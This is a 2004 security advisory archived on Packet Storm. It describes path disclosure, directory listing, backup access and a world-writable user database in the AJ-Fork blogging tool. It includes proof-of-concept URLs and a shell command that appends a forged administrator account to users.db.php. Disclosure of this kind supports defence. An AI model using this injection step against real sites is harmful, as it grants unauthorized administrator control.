exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2004.7

Echo Security Advisory 2004.7
Posted Oct 7, 2004
Authored by y3dips, Echo Security | Site y3dips.echo.or.id

AJ-Fork version 1.67 is susceptible to path disclosure, directory listing, backup directory access, and other flaws that allow access to database files. Exploitation provided.

tags | exploit
SHA-256 | 8ec6b8d2a7db3b1b263f522b3d69c5e2539d1001dc807514dad9cd3127bed9d8

Echo Security Advisory 2004.7

Change Mirror Download


ECHO_ADV_07$2004

---------------------------------------------------------------------------
Multiple Vulnerabilities in AJ-Fork
---------------------------------------------------------------------------

Author: y3dips
Date: September, 23th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv07-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core,
the aim of the project is to improve what can be improved, and extend what
can be extended without adding too much bloat (in fierce opposition to the
mainstream blogging/light publishing tools of today). The project aims to
be backwards-compatible with CuteNews in what areas are sensible.

version : AJ-Fork v. 167
web : http://appelsinjuice.org

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

Almost all Script files in plugins/ Directories are not protected against
direct access.

A remote user can access the file to cause the system to display an error
message that indicates the installation path. The resulting error message
will disclose potentially sensitive installation path information to the
remote attacker.

vulnerable files are :

auto-acronyms.php, auto-archive.php, count-article-views.php, kses.php,
custom-quick-tags.php, disable-all-comments.php , easy-date-format.php,
enable-disable-comments.php, filter-by-author.php, format-switcher.php,
long-to-short.php, prospective-posting.php, sort-by-xfield.php,



POC :

- auto-acronyms.php files

http://localhost/ajfork/plugins/auto-acronyms.php

Fatal error: Call to undefined function: add_filter() in/var/www/html/ajfork
/plugins/auto-acronyms.php on line 13

- auto-archive.php files

http://localhost/ajfork/plugins/auto-archive.php

Fatal error: Cannot instantiate non-existent class: pluginsettings in
/var/www/html/ajfork/plugins/auto-archive.php on line 42

also in shows.inc.php files in inc/ directories

http://localhost/ajfork/inc/shows.inc.php

Warning: main(/inc/plugins.php): failed to open stream: No such file or
directory in /var/www/html/ajfork/inc/shows.inc.php on line 4

Warning: main(): Failed opening '/inc/plugins.php' for inclusion
(include_path='.:/usr/share/pear')
in /var/www/html/ajfork/inc/shows.inc.php on line 4

Fatal error: Call to undefined function: loadactiveplugins()
in /var/www/html/ajfork/inc/shows.inc.php on line 5


B. Directory listing to All directory

All the directory such as data ,inc ,plugins, skins, tools are not protected
again direct access, a remote user that access the directories could see the
list of file or script, and able to download some file. (eg .pl , .mdu )

POC :

http://localhost/ajfork/inc/main.mdu


C. Access to backup directory

If a remote user point out the url in the browser to
http://localhost/ajfork/data/backup/ , then it get an warning message :

You can not view the content of this directory !!!

but if u go straigt to backup directories (the backup is in directories form)

POC :

the name of backup is : dudul
then go to : http://localhost/ajfork/data/backup/dudul
after that a remote user will see the listing of files in 'dudul' directories

Name Last modified Size Description

Parent Directory -
archives/ 23-Sep-2004 02:32 -
comments.txt 23-Sep-2004 02:32 14
news.txt 23-Sep-2004 02:32 2.1K

D. Access to Database file are allowed (Write, Read, Execute)

Ajfork use file "users.db.php" as database file to archive user information
( surname, id, *password ) , and the worst thing is the install instruction

This is the readme file, showing the instruction, which is can be reach at
http://[$SITE]/ajfork/readme.htm

--------------------------------readme.htm---------------------------------

Installing

Installing CuteNews AJ-Fork is really quite simple, but to make it even more
simple for you, this step-by-step guide has been written:
1. ---
5. Use your FTP client to CHMOD:
777 (755 might work): all files and folders in the "data/ folder"
644 (or just 777): index.php
This will enable the script to read/write from/to its datafiles.
7. ---


---------------------------------- eof ---------------------------------

so what is the problem ?
the real problem is ? the "users.db.php" are in the data/ folder , it means
that other user/nobody account can write to that file. then [attacker] could
inject the file with "known" database format.

POC :

dudul : ajfork user / admin [1]
y3dips : [ATTACKER] (user with the same host)

---------------------------------users.db.php-----------------------------
<?PHP die("You don't have access to open this file."); ?>

1095859199|1|dudul|c3cf519bdad87c229a203ae5a42a23f2|dudul|dudul@dudul.com|1|0||1096478833||
---------------------------------- EOF ----------------------------------

Scenario :

^ [y3dips@ESC data]$ pwd
/var/www/html/ajfork/data

^ [y3dips@ESC data]$ ls -la users.db.php
-rwxrwxrwx 1 dudul dudul 433 Sep 30 00:30 users.db.php


^ [y3dips@ESC data]$ echo "1096482670|1|y3dips|fb8ce4bfe2d0cafce47202961ecc64b3|y3dips|y3dips@ganteng.com|0|0||||" >> users.db.php

let see the file "users.db.php"

---------------------------------users.db.php-----------------------------
<?PHP die("You don't have access to open this file."); ?>

1095859199|1|dudul|c3cf519bdad87c229a203ae5a42a23f2|dudul|dudul@dudul.com|1|0||1096478833||
1096482670|1|y3dips|fb8ce4bfe2d0cafce47202961ecc64b3|y3dips|y3dips@ganteng.com|0|0||||
------------------------------------- EOF --------------------------------

now, just go to the site and manage the site with y3dips account (administrator)


not only that , you can only read the file and grab the info to gain the
encrypted password, but it is easier to insert :)

*notice : The sad thing, ive change the file (users.db.php) permission to 755 ,
but i found error in the top of the page.

Warning: fopen(./data/users.db.php): failed to open stream:
Permission denied in /var/www/html/ajfork/index.php on line 146 .......

that because browser (acctually with nobody access) can't write to the file
, coz the users.db.php used to updated the info also you cant do any change
to user setting (add or edit user )

--------------------------------------------------------------------------

The fix:
~~~~~~~~
Vendor allready contacted but still no response

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ yudhax, biatch-x, lieur-euy, yadi_syahid
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o & #aikmel @DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close